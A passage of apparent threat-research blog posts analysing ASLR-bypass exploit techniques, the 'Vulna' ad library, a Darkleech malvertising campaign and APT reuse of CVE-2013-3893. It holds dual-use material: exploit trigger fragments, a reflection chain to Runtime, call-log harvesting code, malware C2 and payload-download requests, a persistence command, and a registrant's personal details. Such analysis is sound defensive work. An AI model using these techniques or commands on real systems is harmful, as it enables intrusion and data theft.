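    static final int IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040;

    // Returns true if the PE image was linked with /DYNAMICBASE (ASLR-compatible).
    // Assumes a well-formed PE header at the start of `image`.
    static boolean hasDynamicBase(byte[] image) {
        ByteBuffer buf = ByteBuffer.wrap(image).order(ByteOrder.LITTLE_ENDIAN);
        int peOffset = buf.getInt(0x3C);              // e_lfanew in the DOS header
        if (buf.getInt(peOffset) != 0x00004550) {     // "PE\0\0" signature
            throw new IllegalArgumentException("not a PE image");
        }
        // The optional header begins 24 bytes after the PE signature;
        // DllCharacteristics sits at offset 70 within it (same for PE32 and PE32+).
        short dllCharacteristics = buf.getShort(peOffset + 24 + 70);
        return (dllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
    }
}
```

Running a check like this over MSVCR71.DLL or HXDS.DLL would show the flag absent, which is exactly why these modules load at predictable addresses.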

              Modify the BSTR length/null terminator

              This technique first appeared in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as a buffer overflow, an arbitrary memory write, or increasing or decreasing the content of a memory pointer.

              The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

              Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.
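              The mechanics can be illustrated without any real memory corruption. In this simulation (all names and values are ours, not taken from any exploit), a "BSTR" is modeled as a length-prefixed, null-terminated UTF-16 string laid out next to another object in a flat buffer; once the terminator is overwritten, reading the string runs into the neighboring object's data, leaking it:

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

class BstrOverread {
    // Reads UTF-16 code units until a null terminator, as naive BSTR
    // consumers effectively do.
    static String readWideString(ByteBuffer heap, int offset) {
        StringBuilder sb = new StringBuilder();
        for (int i = offset; ; i += 2) {
            char c = heap.getChar(i);
            if (c == 0) break;
            sb.append(c);
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Simulated heap: [len][utf-16 chars][null term][adjacent object data]
        ByteBuffer heap = ByteBuffer.allocate(32).order(ByteOrder.LITTLE_ENDIAN);
        heap.putInt(0, 4);            // BSTR byte length
        heap.putChar(4, 'A');
        heap.putChar(6, 'B');
        heap.putChar(8, '\0');        // null terminator
        heap.putInt(10, 0x41424344);  // neighbouring "object" (e.g. a vftable pointer)

        System.out.println(readWideString(heap, 4));   // within bounds: "AB"
        heap.putChar(8, '\u00fe');    // off-by-one DEC corrupts the terminator
        // Now the read runs past the BSTR into the neighbouring object,
        // disclosing its address-bearing contents to the attacker.
        System.out.println(readWideString(heap, 4).length() > 2);
    }
}
```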


              The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


              Consider the following memory layout before the DEC operation:

              [string][null][non-null data][object]

              After the DEC operation (in our tests, it is decreased twice), the memory becomes:

              [string][\xfe][non-null data][object]

              For further details, refer to the technique write-up on Immunity Inc.’s blog.


              This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

              Modify the Array object

              The Array object length modification is similar to the BSTR length modification: both require a certain class of “user-friendly” vulnerabilities. Even better, from the attacker’s point of view, is that once the length changes, the attacker can arbitrarily read from or write to memory, basically taking control of the whole process flow and achieving code execution.

              Here is the list of known zero-day exploits using this technique:


              This exploit involves a buffer overflow in Adobe Flash Player’s regular expression handling. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get the base address of flash.ocx.

              Here’s how the exploit works:

              1. Set up a contiguous memory layout by allocating the following objects:
              2. Free the <Number> object at index 1 of the above objects as follows:

                obj[1] = null;
              3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

                boom = "(?i)()()(?-i)||||||||||||||||||||||||";
                var trigger = new RegExp(boom, "");

              Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.
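              The effect of the corrupted length can be sketched with a toy "heap" of 32-bit cells; all names and values here are illustrative, not taken from the exploit. Once the length header is enlarged, indexing that looks in-bounds to the vector reaches the neighboring object's fields:

```java
class VectorLengthCorruption {
    // Returns the value "leaked" from beyond the vector's real bounds once
    // its length header has been corrupted. Pure simulation of the concept.
    static int corruptAndLeak() {
        int[] heap = new int[8];
        heap[0] = 3;                      // vector length header
        heap[1] = 10; heap[2] = 20; heap[3] = 30;   // real elements
        heap[4] = 0x10A40000;             // neighbour: stand-in for a module base address

        heap[0] = 7;                      // the overflow enlarges the length header
        return heap[1 + 3];               // element index 3 reads past the real end
    }

    public static void main(String[] args) {
        System.out.printf("leaked 0x%08X%n", corruptAndLeak());
    }
}
```

In the real exploit the "leak" is a pointer into flash.ocx, from which the module base and ROP gadgets are computed.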


              This vulnerability involves an IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

              Basically, this vulnerability modifies arbitrary memory content using an OR instruction, something like the following:

              or dword ptr [esi+8],20000h

              Here’s how it works:

              1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:
              2. After the spray, those objects are stored aligned at stable memory addresses. For example:

                The first dword, 0x03f0, is the length of the Vector.<uint> object, and the highlighted values correspond to the values in the spray code above.

              3. If the attacker points esi + 8 at the 0x03f0 length field, the size becomes 0x0203f0 after the OR operation, which is much larger than the original size.
              4. With the larger access range, the attacker can change the next object's length to 0x3FFFFFF0.
              5. From there, the attacker can access the whole memory space of the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attributes and bypass DEP as follows:
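              The arithmetic in step 3 is easy to verify: OR-ing 0x20000 into a length field holding 0x03f0 yields 0x0203f0.

```java
class OrLengthDemo {
    // Effect of `or dword ptr [esi+8], 20000h` when esi+8 points at the
    // Vector.<uint> length field.
    static int corruptLength(int length) {
        return length | 0x20000;
    }

    public static void main(String[] args) {
        System.out.printf("0x%06X%n", corruptLength(0x03f0));  // prints 0x0203F0
    }
}
```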

              By crafting the memory layout, the attacker also allocates a Vector.<object> that contains a flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search for the sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.


              The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:


              In the above code, all the variables that start with “m” are read from the user-controlled object. If the attacker can set the object to meet the condition in the second “if” statement, the code path is forced into the setImageAnimationMode() call, where the memory write is triggered. Inside setImageAnimationMode(), the code looks like the following:


              In this exploit, the attacker uses ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element of var2 has an original size of 0xff004.


              After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can locate this ArrayBuffer by comparing byteLength values in JavaScript, and can then read from or write to memory with the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300) and manually hardcoded the offsets to construct the ROP payload.
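              The sizes line up if the single 16-bit write of 0x0001 lands on the top byte of the little-endian length dword: 0x000ff004 then becomes 0x010ff004. The exact write offset in this sketch is our assumption, chosen to reproduce that arithmetic:

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

class WordWriteDemo {
    // Simulates the single word write of 0x0001 landing on the high byte of
    // the ArrayBuffer's little-endian length field. The offset (byte 3) is an
    // assumption made so the arithmetic matches the sizes quoted in the text.
    static int corrupt(int originalLength) {
        ByteBuffer mem = ByteBuffer.allocate(8).order(ByteOrder.LITTLE_ENDIAN);
        mem.putInt(0, originalLength);     // bytes: 04 F0 0F 00 ...
        mem.putShort(3, (short) 0x0001);   // unaligned 16-bit write into byte 3
        return mem.getInt(0);
    }

    public static void main(String[] args) {
        System.out.printf("0x%08X%n", corrupt(0xff004));   // prints 0x010FF004
    }
}
```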


              This vulnerability involves a Java CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break out of the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

              The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.


              The following table outlines recent APT zero-day exploits and what bypass techniques they used:



              ASLR bypasses have become more and more common in zero-day attacks. We have seen previous IE zero-day exploits use a non-ASLR Microsoft Office DLL to bypass ASLR, and Microsoft has added mitigations to its latest OS and browser to prevent the use of non-ASLR modules in this way. Because the old technique no longer works and can be easily detected, cybercriminals will have to move to more advanced exploitation techniques. For specific vulnerabilities that allow writing memory, combining Vector.<uint> and Vector.<object> is more reliable and flexible: with just one shot, an exploit can be extended from writing a single byte to reading or writing gigabytes, and the approach works on the latest OS and browser regardless of application or language version.

              Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

              But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

              Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

              Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

              FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggressive libraries are proprietary, and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues, and they are actively addressing them.

              Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

              We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

              Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive—if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities, when exploited, allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without the user’s knowledge, stealing two-factor authentication tokens sent via SMS, or turning the device into part of a botnet.

              We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

              The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

              • Aggressive Behaviors

                • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

                • Vulna will download arbitrary code and execute it when instructed by the remote server.

              • Vulnerabilities

                • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

                • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

                • Vulna uses Android’s WebView with JavaScript-to-Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.
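                The root cause of that binding vulnerability is that, before Android API level 17 introduced the @JavascriptInterface annotation, every public method of an object bound via addJavascriptInterface() was callable from page JavaScript, including getClass(). The reflective chain attackers use can be shown in plain Java; the ExposedBridge class below is a hypothetical stand-in for an ad library's bound object, not code from Vulna:

```java
import java.lang.reflect.Method;

class JsBindingReflection {
    // Hypothetical stand-in for a harmless-looking object an ad library
    // might expose to WebView JavaScript via addJavascriptInterface().
    static class ExposedBridge {
        public String version() { return "1.0"; }
    }

    public static void main(String[] args) throws Exception {
        Object bridge = new ExposedBridge();
        // Injected JavaScript only "sees" `bridge`, but on pre-4.2 Android
        // every public method is reachable, including getClass(). From there,
        // reflection reaches Runtime, i.e. arbitrary command execution:
        Class<?> runtimeClass = bridge.getClass()
                .getClassLoader()
                .loadClass("java.lang.Runtime");
        Method getRuntime = runtimeClass.getMethod("getRuntime");
        Object runtime = getRuntime.invoke(null);
        System.out.println(runtime instanceof Runtime);  // prints true
    }
}
```

This is why serving the page over plain HTTP is so dangerous: anyone who can tamper with the traffic can inject script that walks this chain.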

                  Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on a user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history, and bookmarks; and creating icons on the home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

                  • steal two-factor authentication token sent via SMS
                  • view photos and other files on the SD card
                  • install icons used for phishing attacks on the home screen
                  • delete files and destroy data on demand
                  • impersonate the owner and send forged text messages to business partners
                  • delete incoming text messages without the user’s notice
                  • place phone calls
                  • use the camera to take photos without the user’s notice
                  • read bookmarks or change them to point to phishing sites

                  There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

                  Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

                  Despite the severe threats it poses, Vulna is stealthy and hard to detect:

                  • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

                  • Vulna obfuscates its code, which makes traditional analysis difficult.

                  • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

                    Vulna's screen shot

                  FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues, the list of impacted apps, and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and are actively addressing them.

                  In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly-growing class of mobile threats, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not just limited to ad libraries; it also applies to other third-party components and apps.


                  Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

                  Appendix: Sample code snippet of collecting and sending call logs in Vulna


                  import java.util.ArrayList;
                  import java.util.List;
                  import android.database.Cursor;
                  import android.provider.CallLog;

                  class x implements Runnable {
                      public void run() {
                          List localList = get_call_log();
                          // ... the collected log is then sent to the remote server ...
                      }

                      List get_call_log() {
                          ArrayList localArrayList = new ArrayList();
                          Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,
                                  new String[] { "number", "type", "date" }, null, null,
                                  "date DESC limit 10");
                          Cursor cur2 = cur1;
                          if (cur2 != null) {
                              int i = cur2.getColumnIndex("number");
                              int j = cur2.getColumnIndex("type");
                              while (cur2.moveToNext()) {
                                  String str = cur2.getString(i);
                                  if ((cur2.getInt(j) == 2) && (!localArrayList.contains(str))) {
                                      localArrayList.add(str);  // collect unique outgoing numbers
                                  }
                              }
                          }
                          return localArrayList;
                      }
                  }


              Another Darkleech Campaign

              Last week, our external careers web site got us up close and personal with Darkleech and Blackhole.

              The fun didn’t end there. This week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:


              Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc on computers by exploiting vulnerabilities in client applications like IE, Java, and Adobe products. Computers that are vulnerable to exploits launched by Blackhole are likely to become infected with one of several flavors of malware, including ransomware, Zeus/Zbot variants, and click-fraud trojans like ZeroAccess.

              We started logging hits at 21:31:00 UTC on Sunday, 09/22/2013. The campaign has been ongoing, peaking on Monday and tapering down throughout the week.

              During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark, no longer serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

              This left some scratching their heads as to whether the noise was a real threat.

              Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.



              Figure 1. – Session demonstrating exploit via IE browser and Java.


              The server returned the (obfuscated) Blackhole Landing page; no 404 this time.


              Figure 2 – Request and response to delivery[.]globalcdnnode[.]com.


              The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.


              Figure 3 – Packet capture showing JAR file being downloaded.


              Figure 4. – Some of the Java class files visible in the downloaded Jar.


              Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

              We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.


              Name: Alexey Prokopenko
              Organization: home
              Address: Lenina 4, kv 1
              City: Ubileine
              Province/state: LUGANSKA OBL
              Country: UA
              Postal Code: 519000
              Email: alex1978a

              By the way, this actor has a long history of malicious activity online too.

              The campaign also appears to be abusing Amazon Web Services.


              origin =
              mail addr =

              At the time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple of minutes, thwarting attempts at shutting down the domain by constantly being on the move.


              Figure 5. – The familiar Plesk control panel, residing on the server.

              This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high-profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, it’s not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp:// in the background.

              To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.



              Figure 6. – DTI graph showing number of Darkleech detections logged each day.

              By using malvertising and/or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, oftentimes in the background, while you browse sites that have nothing to do with the attack (as was the case with our careers site).

              Imagine a scenario where a good portion of enterprise users have a home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from third-party advertiser networks and/or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and/or infection, even though the news website’s server is itself clean.

              So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages. If Darkleech is lurking in those advertisement waters, you could end up with a leech or two attached to your network.

              Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

              Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand off exploits to others who are lower on the zero-day food chain, especially after an exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using it are not otherwise related.

              In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

              Exploit Reuse

              Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm happened by at least August 23, 2013), the same exploit was used by different threat actors.


              On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan ( and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

              The Poison Ivy binary used in this attack was configured with the following properties:

              ID: gua925

              Group: gua925

              DNS/Port: Direct:, Direct:,

              Proxy DNS/Port:

              Proxy Hijack: No

              ActiveX Startup Key:

              HKLM Startup Entry:

              File Name:

              Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe

              Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun

              Inject: No

              Process Mutex: ;A>6gi3lW

              Key Logger Mutex:

              ActiveX Startup: No

              HKLM Startup: No

              Copy To: No

              Melt: No

              Persistence: No

              Keylogger: No

              Password: LostC0ntrol2013~2014

              This configuration matches other Web2Crew samples, particularly the ‘gua925’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs, including:







              Additionally, the IP address was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

              DATE DOMAIN
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-15
              2013-08-16
              2013-08-16
              2013-08-16
              2013-08-16
              2013-08-16
              2013-08-21
              2013-08-29
              2013-08-29
              2013-08-29
              2013-08-29

              We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.
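              Pivoting on shared CnC infrastructure, as in the resolution table above, can be sketched as a filter over passive-DNS records. The domains and IP addresses below are placeholders; the real values are not reproduced in this post:

```python
import datetime

# Hypothetical passive-DNS records: (first_seen, domain, ip).
# Both the domains and the IPs are placeholder values.
records = [
    ("2013-08-15", "example-c2-a.test", "203.0.113.10"),
    ("2013-08-16", "example-c2-b.test", "203.0.113.10"),
    ("2013-08-29", "unrelated.test",    "198.51.100.7"),
]

def domains_for_ip(records, ip, start, end):
    """Return domains seen resolving to `ip` within the [start, end] window."""
    lo = datetime.date.fromisoformat(start)
    hi = datetime.date.fromisoformat(end)
    return sorted(
        dom for seen, dom, addr in records
        if addr == ip and lo <= datetime.date.fromisoformat(seen) <= hi
    )

# Domains tied to the same control server suggest related activity.
related = domains_for_ip(records, "203.0.113.10", "2013-08-15", "2013-08-29")
```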


              The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013, a compromised Taiwanese government website was used to host the same exploit; however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396 and connected to its own CnC servers.

              We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with an MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6, which connected to its own command and control server. We found this sample targeting the same financial services firm targeted by the Web2Crew actor discussed above.

              Both of these samples were the newer versions of Taidoor that we previously described here.


              The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single byte key of 0x95.

              The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

              GET /dev/js/heap.php HTTP/1.1


              User-Agent: Mozilla/4.0 (compatible)


              Cache-Control: no-cache

              The Poison Ivy payload then connected to a command and control server.

              The deobfuscated stage 1 payload has an MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor also customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.

              Infrastructure Reuse

              APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC even though it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

              Specifically, one of the reported DeputyDog command and control servers had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the IP hosted a Poison Ivy control server and was used to target a gaming company as well as a high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

              We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals, calling back to a command and control server. There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

              This malware family and the CnC infrastructure are part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs multiple malware tools and utilizes a diverse command and control infrastructure.


              The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. A variety of different campaigns sometimes make use of the same malware (including widely available tools such as Poison Ivy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

              • The first observed usage of CVE-2013-3893, in Operation Deputy Dog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
              • CVE-2013-3893 has subsequently been used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
              • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.

              Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets

              FireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign, which we have labeled ‘Operation DeputyDog’, began as early as August 19, 2013 and appears to have targeted organizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor responsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current campaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on Bit9.

              Campaign Details

              On September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was being used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in Japan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same threat actor that compromised Bit9 in February 2013.

              FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).
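              The single-byte XOR obfuscation described here is trivial to undo. A minimal sketch; the sample bytes are synthetic, not the real payload:

```python
def xor_decode(data: bytes, key: int = 0x95) -> bytes:
    """Undo a single-byte XOR obfuscation (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)

# Synthetic demo: XOR a minimal DOS header stub with 0x95, then decode it.
# 'M' (0x4d) ^ 0x95 = 0xd8 and 'Z' (0x5a) ^ 0x95 = 0xcf, so an obfuscated
# executable begins with 0xd8 0xcf rather than the usual "MZ" magic.
encoded = bytes(b ^ 0x95 for b in b"MZ\x90\x00")
decoded = xor_decode(encoded)
assert decoded[:2] == b"MZ"
```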

              Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

              C:\Documents and Settings\All Users\Application Data\28542CC0.dll

              In order to maintain persistence, the original malware adds a registry key with this value:

              rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

              The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea. This callback traffic is HTTP over port 443, which is typically used for HTTPS-encrypted traffic; however, this traffic is neither HTTPS nor SSL-encrypted. Instead, the clear-text callback traffic resembles this pattern:

              POST /info.asp HTTP/1.1

              Content-Type: application/x-www-form-urlencoded

              Agtid: [8 chars]08x

              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)


              Content-Length: 1045

              Connection: Keep-Alive

              Cache-Control: no-cache

              [8 chars]08x&[Base64 Content]

              The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.
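              A network defender could match this header pattern with a simple regular expression. The character class for the 8-character field is an assumption (the observed samples may use a narrower alphabet), and the request below is a synthetic reconstruction of the traffic shown above:

```python
import re

# The Agtid header format described above: 8 characters followed by "08x".
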